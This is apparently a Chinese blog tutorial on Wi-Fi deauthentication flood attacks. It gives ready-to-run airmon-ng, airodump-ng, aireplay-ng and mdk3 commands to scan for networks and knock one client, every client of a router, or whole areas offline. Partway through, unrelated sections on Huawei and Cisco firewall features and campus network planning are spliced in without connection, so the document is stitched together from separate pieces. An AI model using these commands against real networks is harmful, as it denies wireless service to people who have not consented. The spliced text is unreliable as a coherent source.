Deauth Flood 攻击

简介:

Deauth Flood 攻击即为取消验证洪水攻击,它旨在通过欺骗从 AP 到客户端单播地址的取消身份验证帧来将客户端转为未关联 / 未认证的状态。对于目前的工具来说,这种形式的攻击在打断客户无线服务方面非常有效和快捷。一般来说,在攻击者发送另一个取消身份验证帧之前,客户端会重新关联和认证以再次获取服务。攻击者反复欺骗取消身份验证帧就能使所有客户端持续拒绝服务。

攻击步骤

1.探测周围的无线路由器以及连接到无线路由器上的设备

airmon-ng start wlan0  #开启无线网卡的监听模式
airodump-ng wlan0mon

在这里插入图片描述
2.使用aireplay进行攻击

指定特定的无线路由器上的特定设备进行Deauth Flood 攻击 10 是发送10次数据包如果是0的话就是一直发送数据包 -a 是路由器的mac -c 是连接在无线路由器上的设备的mac wlan0mon是无线网卡

aireplay-ng -0 10 -a 80:B0:7B:18:70:E0  -c FC:BE:7B:BE:35:E3 wlan0mon  

在这里插入图片描述

在这里插入图片描述

我测试的设备分别是我家的路由器和我的手机,从这里我们可以看到我的手机已经被踢下线了

2.攻击指定路由器上的全部设备

aireplay-ng -0 0 -a 80:B0:7B:18:70:E0 wlan0mon

在这里插入图片描述
3.使用mdk3进行全网攻击(效果一样)

mdk3 wlan0mon d

在这里插入图片描述

三、所选品牌防火墙的功能介绍 华为防火墙: 1、网络边界防护:包括流量过滤、攻击检测及防御、入侵检测等功能。 2、应用层安全防护:能够对 HTTP、SMTP、FTP、DNS 等协议进行深度包检测,防止应用层攻击。 3、VPN 功能:支持 IPSec VPN、SSL VPN、GRE VPN 等多种 VPN 方案,实现远程访问和分支互联。 4、流量管理:支持带宽控制、流量限制、流量统计等功能,有效防止网络拥塞。 5、安全管理:支持身份认证、访问控制、安全审计等功能,保障网络安全。 思科防火墙: 1、网络边界防护:包括防止 DDoS 攻击、防火墙 ACL、应用控制等功能。 2、安全服务:包括 IPS、URL 过滤、AMP 等服务,有效防御漏洞攻击和恶意软件。 3、VPN 功能:支持 IPSec VPN、SSL VPN 等多种 VPN 方案,实现远程访问和分支互联。 4、流量管理:支持带宽控制、流量限制、QoS 等功能,防止网络拥塞和提高网络质量。 5、安全管理:支持 AAA 认证、访问控制、安全审计等功能,保障网络安全。 四、场景网络部署架构规划 本次场景网络部署涉及到园区内的多个子网和外部网络之间的连接,因此需要使用多台防火墙进行部署。 1、外部网络连接:使用两台防火墙进行双机热备配置,同时连接外部网络。 2、园区内部连接:使用两台防火墙进行双机热备配置,同时连接园区内部网络。 3、DMZ 区域连接:使用一台防火墙连接 DMZ 区域,实现与外部网络的隔离。 4、VPN 连接:使用一台防火墙配置 VPN 服务,实现远程访问和分支互联。 五、模拟器上实现的功能及配置 1、网络边界防护:配置防火墙 ACL,限制外部网络对内部网络的访问。 2、应用层安全防护:配置 IPS、URL 过滤等服务,防止应用层攻击。 3、VPN 功能:配置 IPSec VPN 和 SSL VPN,实现远程访问和分支互联。 4、流量管理:配置带宽控制、流量限制、QoS 等功能,防止网络拥塞和提高网络质量。 5、安全管理:配置 AAA 认证、访问控制、安全审计等功能,保障网络安全。 具体配置及截图见附件。 六、补充内容 1、防火墙的日志管理功能:可以配置日志审计、日志记录等功能,及时发现网络安全问题。 2、防火墙的高可用性配置:可以配置双机热备、VRRP 等功能,保证网络的高可用性。 3、防火墙的数据备份与恢复功能:可以对配置文件、日志文件等进行备份,以便在设备出现故障时快速恢复。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值